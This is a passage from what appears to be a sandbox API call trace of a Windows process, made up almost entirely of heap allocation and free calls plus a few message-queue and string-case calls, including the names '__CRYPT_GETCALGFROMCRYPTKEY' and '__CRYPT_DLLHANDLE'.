0x9c2738 [0191.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0191.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0191.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0191.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x103c4) returned 0xbea018 [0191.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2778 [0191.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0191.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0191.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27a8 [0191.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0191.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0191.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0191.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0191.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0191.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a60 [0191.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0191.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0191.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0191.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0191.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x103c4) returned 0xa5f008 [0191.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0191.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0191.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0191.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0191.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0191.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0191.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0191.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0191.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0191.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0191.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0191.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0191.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0191.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0191.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0191.321] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0191.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0191.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0191.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0191.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0191.321] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0191.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0191.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0191.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0191.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0191.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0191.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0191.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0191.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0191.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0191.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0191.359] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0191.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0191.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2688 [0191.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0191.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0191.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0191.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0191.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda68 [0191.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0191.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0191.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0191.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0191.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0191.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0191.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0191.360] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0191.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0191.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0191.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0191.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0191.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0191.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0191.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0191.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0191.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0191.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0191.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0191.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0191.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0191.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0191.360] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0191.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0191.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0191.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0191.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0191.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0191.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0191.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0191.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0191.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0191.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0191.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0191.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0191.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0191.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0191.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0191.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0191.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0191.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0191.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.362] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0191.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0191.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0191.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0191.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0191.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0191.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0191.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0191.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0191.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0191.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0191.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0191.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0191.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0191.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0191.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0191.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0191.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0191.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0191.363] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0191.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0191.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0191.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0191.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0191.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0191.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0191.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0191.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0191.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.363] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0191.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5d0 [0191.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0191.364] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0191.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0191.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0191.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0191.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0191.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0191.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0191.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0191.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0191.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0191.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0191.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0191.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0191.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0191.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0191.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0191.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0191.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0191.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0191.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0191.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0191.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0191.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0191.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0191.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0191.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0191.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0191.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0191.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0191.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0191.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0191.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0191.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0191.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0191.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0191.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0191.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0191.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0191.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0191.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0191.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0191.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0191.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0191.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0191.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0191.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0191.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0191.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0191.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0191.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0191.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0191.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0191.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0191.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0191.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0191.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0191.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0191.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0191.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0191.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0191.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0191.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0191.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0191.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0191.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0191.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 